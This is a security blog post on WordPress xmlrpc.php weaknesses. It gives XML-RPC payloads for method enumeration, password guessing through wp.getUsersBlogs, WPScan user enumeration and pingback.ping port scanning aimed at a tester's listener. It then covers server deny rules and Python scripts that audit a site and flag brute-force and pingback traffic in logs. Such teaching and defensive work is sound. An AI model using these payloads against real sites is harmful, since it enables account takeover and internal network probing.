
WordPress xmlrpc.php: common vulnerabilities & how to exploit them

You might have seen a /xmlrpc.php file on many WordPress sites you visit; you might even have searched for the error ("XML-RPC server accepts POST requests only") that appears when you open http://site.com/wp/xmlrpc.php. In this post I'll highlight the common vulnerabilities associated with the xmlrpc.php file.

May 11, 2026 | 4 min read | Arjun Shaji

Contents
  1. What is XML-RPC?
  2. Common Vulnerabilities in XML-RPC
  3. Brute Force Attack via XML-RPC
       Step 1 — Access xmlrpc.php
       Step 2 — Intercept the Request
       Step 3 — Enumerate Available Methods
       Important Methods to Look For
  4. Performing a Brute Force Attack
  5. Username Enumeration
  6. Using Burp Intruder
  7. Important Note
  8. XSPA / Internal Port Scanning Using pingback.ping
       Step 1 — Verify Method Availability
       Step 2 — Start a Listener
       Step 3 — Send the pingback Request
       Interpreting Responses
  9. Security Recommendations
       Disable XML-RPC (If Not Needed)
       Use Security Plugins
       Restrict Login Attempts
       Keep WordPress Updated
  10. Disclaimer

What is XML-RPC?

XML-RPC on WordPress is an API (“Application Programming Interface”) that allows external applications and services to communicate with a WordPress website.

It enables developers to build mobile apps, desktop apps, and third-party services that can interact with WordPress remotely.

Using XML-RPC, applications can perform actions such as:

  • Publish posts
  • Edit posts
  • Delete posts
  • Upload files (images, media, etc.)
  • Retrieve comments
  • Edit comments

The XML-RPC endpoint is usually located at:

http://targetwebsite.com/xmlrpc.php

Common Vulnerabilities in XML-RPC

The most common security issues associated with XML-RPC are:

  • Brute-force login attacks
  • Username enumeration
  • DDoS amplification
  • XSPA (Cross-Site Port Attacks) / Internal port scanning using pingbacks

Brute Force Attack via XML-RPC

Step 1 — Access xmlrpc.php

Visit:

http://targetwebsite.com/xmlrpc.php

You will usually see a message like:

XML-RPC server accepts POST requests only.

Step 2 — Intercept the Request

Use a proxy tool such as:

  • Burp Suite
  • OWASP ZAP

Capture and resend the request.


Step 3 — Enumerate Available Methods

Send a POST request with the following XML payload:

<methodCall>
    <methodName>system.listMethods</methodName>
    <params></params>
</methodCall>

This returns a list of all available XML-RPC methods.

Important Methods to Look For

Search the response for:

  • wp.getUsersBlogs
  • wp.getCategories
  • metaWeblog.getUsersBlogs

If these methods are enabled, brute-force attacks may be possible.


Performing a Brute Force Attack

Send the following POST request:

<methodCall>
    <methodName>wp.getUsersBlogs</methodName>
    <params>
        <param>
            <value>admin</value>
        </param>
        <param>
            <value>password123</value>
        </param>
    </params>
</methodCall>

Replace:

  • admin → target username
  • password123 → password guess

Username Enumeration

Finding valid usernames significantly improves attack success rates.

Common tools:

  • WPScan
  • Manual author enumeration
  • RSS feed leaks

Example:

wpscan --url http://targetwebsite.com --enumerate u

Using Burp Intruder

Load the request into Burp Intruder and automate password attempts.

Important Note

Both valid and invalid logins usually return:

HTTP/1.1 200 OK

You must distinguish successful logins by:

  • Response length
  • Response body differences
  • Presence of blog information

XSPA / Internal Port Scanning Using pingback.ping

Some WordPress installations expose the method:

pingback.ping

This can sometimes be abused for internal network scanning.


Step 1 — Verify Method Availability

Use:

<methodCall>
    <methodName>system.listMethods</methodName>
    <params></params>
</methodCall>

Search for:

pingback.ping

Step 2 — Start a Listener

You can use:

  • Netcat
  • Python HTTP server
  • Node.js HTTP server
  • Apache/Nginx logs

Example:

python3 -m http.server 8000

Step 3 — Send the pingback Request

<methodCall>
    <methodName>pingback.ping</methodName>
    <params>
        <param>
            <value>
                <string>http://YOUR-SERVER:8000</string>
            </value>
        </param>

        <param>
            <value>
                <string>http://targetwebsite.com/sample-post</string>
            </value>
        </param>
    </params>
</methodCall>

Replace:

  1. YOUR-SERVER:8000 → your listener
  2. sample-post → a valid WordPress post URL

Interpreting Responses

If the response contains something like:

<value><int>17</int></value>

and the value is greater than 0, it may indicate:

  • The port is reachable/open
  • The pingback request succeeded

You can confirm this by checking your listener logs.


Security Recommendations

To secure WordPress against XML-RPC abuse:

Disable XML-RPC (If Not Needed)

Apache (2.2 directives; on Apache 2.4 these only work when mod_access_compat is loaded):

<Files xmlrpc.php>
    Order Deny,Allow
    Deny from all
</Files>

Apache 2.4 native syntax:

<Files xmlrpc.php>
    Require all denied
</Files>

Nginx:

location = /xmlrpc.php {
    deny all;
}
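Once a block like the above is in place, you want to confirm it actually took effect rather than trust the config. As an added example (my code, not the author's or RedOps'), the Python below sends the same system.listMethods call shown earlier in the post to a site you administer and classifies the reply from a defender's point of view: blocked at the web server (a 4xx from the rules above), disabled inside WordPress (a fault reply instead of a method list), or still exposed, in which case it reports which of the credential-accepting methods the post lists and pingback.ping remain. The sample replies at the bottom are constructed so the file runs offline; the audit() helper, its URL and the "disabled" substring match are assumptions.

```python
"""Added example: verify what a WordPress xmlrpc.php endpoint still exposes.

Not code from the post or from RedOps. Sends the system.listMethods call shown
in the post and classifies the reply: blocked at the web server, disabled inside
WordPress, or exposed (with the risky methods that remain). Sample replies
below are constructed so the file runs offline.
"""
import xmlrpc.client
from dataclasses import dataclass, field

# Methods the post singles out: the three accept credentials (brute-force
# surface); pingback.ping is the XSPA / internal port scanning primitive.
CREDENTIAL_METHODS = {"wp.getUsersBlogs", "wp.getCategories", "metaWeblog.getUsersBlogs"}
PINGBACK_METHOD = "pingback.ping"


def build_list_methods_request() -> bytes:
    """Same system.listMethods call as in the post, serialised by the stdlib."""
    return xmlrpc.client.dumps((), methodname="system.listMethods").encode()


@dataclass
class Assessment:
    status: str                      # "blocked", "disabled", "exposed", "unexpected"
    methods: list = field(default_factory=list)
    credential_methods: list = field(default_factory=list)
    pingback_enabled: bool = False
    detail: str = ""


def assess(http_status: int, body: bytes) -> Assessment:
    """Classify one (status, body) pair returned by xmlrpc.php."""
    if http_status in (401, 403, 404, 405):
        # The Apache/Nginx rules in the post produce a 403 here: the best outcome.
        return Assessment("blocked", detail=f"HTTP {http_status} from xmlrpc.php")
    try:
        params, _ = xmlrpc.client.loads(body)   # raises Fault for <fault> replies
    except xmlrpc.client.Fault as fault:
        # Assumption: a disabled XML-RPC API answers every call with a fault whose
        # message mentions "disabled"; any other fault is reported as-is.
        if "disabled" in fault.faultString.lower():
            return Assessment("disabled", detail=fault.faultString)
        return Assessment("unexpected", detail=f"fault {fault.faultCode}: {fault.faultString}")
    except Exception as exc:                    # HTML error page, empty body, ...
        return Assessment("unexpected", detail=f"unparseable response: {exc}")
    methods = sorted(params[0]) if params and isinstance(params[0], list) else []
    creds = sorted(m for m in methods if m in CREDENTIAL_METHODS)
    return Assessment("exposed", methods, creds, PINGBACK_METHOD in methods,
                      detail=f"{len(methods)} methods listed")


def audit(url: str, timeout: float = 10.0) -> Assessment:
    """POST the request to a site you administer (hypothetical helper; the URL is
    whatever you are verifying, e.g. https://your-site.example/xmlrpc.php)."""
    import urllib.error
    import urllib.request
    req = urllib.request.Request(url, data=build_list_methods_request(),
                                 headers={"Content-Type": "text/xml"}, method="POST")
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return assess(resp.status, resp.read())
    except urllib.error.HTTPError as err:        # 403/405 etc. arrive here
        return assess(err.code, err.read())


# Constructed sample replies (not captured from any real site).
SAMPLE_EXPOSED = xmlrpc.client.dumps(
    (["system.listMethods", "wp.getUsersBlogs", "wp.getCategories",
      "metaWeblog.getUsersBlogs", "pingback.ping", "demo.sayHello"],),
    methodresponse=True).encode()
SAMPLE_DISABLED = xmlrpc.client.dumps(
    xmlrpc.client.Fault(405, "XML-RPC services are disabled on this site."),
    methodresponse=True).encode()

if __name__ == "__main__":
    for label, body in (("exposed site", SAMPLE_EXPOSED), ("disabled site", SAMPLE_DISABLED)):
        a = assess(200, body)
        print(f"{label}: {a.status} credential_methods={a.credential_methods} "
              f"pingback={a.pingback_enabled} ({a.detail})")
    print("web-server block:", assess(403, b"").status)
```

Run it as-is to see the three outcomes on the constructed replies; point audit() at your own xmlrpc.php after deploying the Apache or Nginx rule and expect "blocked". An "exposed" result with pingback_enabled set is the case the XSPA section of the post describes.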

Use Security Plugins

Examples:

  • Wordfence
  • Sucuri
  • iThemes Security

Restrict Login Attempts

Implement:

  • Rate limiting
  • CAPTCHA
  • Fail2Ban
  • WAF protections
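Rate limiting and Fail2Ban need a concrete signal to act on. As an added example (my code, not the author's or RedOps'), the Python below parses combined-format Apache/Nginx access logs, flags client IPs that POST to /xmlrpc.php at least a threshold number of times inside a sliding window (the condition a Fail2Ban jail or WAF rule would fire on; as the post notes, a 200 status says nothing about success, so every POST counts), and separately reports inbound requests carrying the "WordPress/..." user agent, which is what a listener or an internal host sees when some WordPress site's pingback.ping is being pointed at it. The log lines, addresses and threshold are constructed; the "verifying pingback from <ip>" suffix in that user agent is an assumption about current WordPress behaviour and is treated as optional.

```python
"""Added example: spot XML-RPC brute-force and pingback-scanning traffic in
access logs. Not code from the post or from RedOps. Log lines are constructed.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Combined log format: ip - user [time] "METHOD path HTTP/x" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
TIME_FMT = "%d/%b/%Y:%H:%M:%S %z"
# Assumption: WordPress appends this to its user agent on pingback fetches,
# naming the client that called pingback.ping. Absent suffixes are tolerated.
ORIGIN_RE = re.compile(r"verifying pingback from (\S+)")


def parse_line(line: str):
    """Return a dict of fields for a combined-format line, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["time"] = datetime.strptime(rec["time"], TIME_FMT)
    rec["status"] = int(rec["status"])
    return rec


def xmlrpc_bruteforce_sources(lines, threshold=10, window=timedelta(seconds=60)):
    """Return {ip: peak_count} for IPs whose POSTs to xmlrpc.php within any
    `window` reach `threshold`. Status codes are ignored on purpose: valid and
    invalid credentials both come back as 200, so the rate is the only signal."""
    recent = defaultdict(deque)          # ip -> timestamps of recent POSTs
    offenders = {}
    for line in lines:
        rec = parse_line(line)
        if not rec or rec["method"] != "POST":
            continue
        if not rec["path"].split("?", 1)[0].endswith("/xmlrpc.php"):
            continue
        q = recent[rec["ip"]]
        q.append(rec["time"])
        while q and rec["time"] - q[0] > window:   # slide the window forward
            q.popleft()
        if len(q) >= threshold:
            offenders[rec["ip"]] = max(offenders.get(rec["ip"], 0), len(q))
    return offenders


def inbound_pingback_fetches(lines):
    """Requests arriving with WordPress' own HTTP user agent. On a listener or
    an internal host this is the footprint of pingback.ping being used to reach
    you. Returns (wordpress_server_ip, path, originating_client_or_None)."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec and rec["ua"].startswith("WordPress/"):
            origin = ORIGIN_RE.search(rec["ua"])
            hits.append((rec["ip"], rec["path"], origin.group(1) if origin else None))
    return hits


# Constructed sample log (documentation-range addresses, not real traffic).
SAMPLE_LOG = [
    # twelve POSTs to xmlrpc.php from one client inside twelve seconds
    *(f'203.0.113.7 - - [11/May/2026:10:00:{i:02d} +0000] "POST /xmlrpc.php HTTP/1.1" '
      f'200 412 "-" "python-requests/2.31"' for i in range(12)),
    # a single legitimate-looking XML-RPC call and an ordinary page view
    '198.51.100.4 - - [11/May/2026:10:00:30 +0000] "POST /xmlrpc.php HTTP/1.1" 200 412 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [11/May/2026:10:00:31 +0000] "GET /wp-login.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    # what a listener sees when a WordPress server is told to pingback it
    '192.0.2.10 - - [11/May/2026:10:01:05 +0000] "GET / HTTP/1.1" 200 612 "-" '
    '"WordPress/6.5; https://blog.example; verifying pingback from 203.0.113.7"',
]

if __name__ == "__main__":
    print("brute-force sources:", xmlrpc_bruteforce_sources(SAMPLE_LOG))
    for server_ip, path, origin in inbound_pingback_fetches(SAMPLE_LOG):
        print(f"pingback fetch from WordPress at {server_ip} for {path}; caller={origin}")
```

Feed it your real access log (one line per element) and tune threshold and window to your traffic; the offender dictionary is what you would hand to a firewall rule or a Fail2Ban action, and the pingback hits tell you which WordPress server to notify when your listener or an internal host is being probed through it.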

Keep WordPress Updated

Always update:

  • WordPress core
  • Plugins
  • Themes

Disclaimer

This information is intended for:

  • Authorized penetration testing
  • Security research
  • Defensive security assessments

Do not test systems without explicit permission.

Author

Arjun Shaji

Practitioner-written offensive security research from RedOps Security.

Discuss an assessment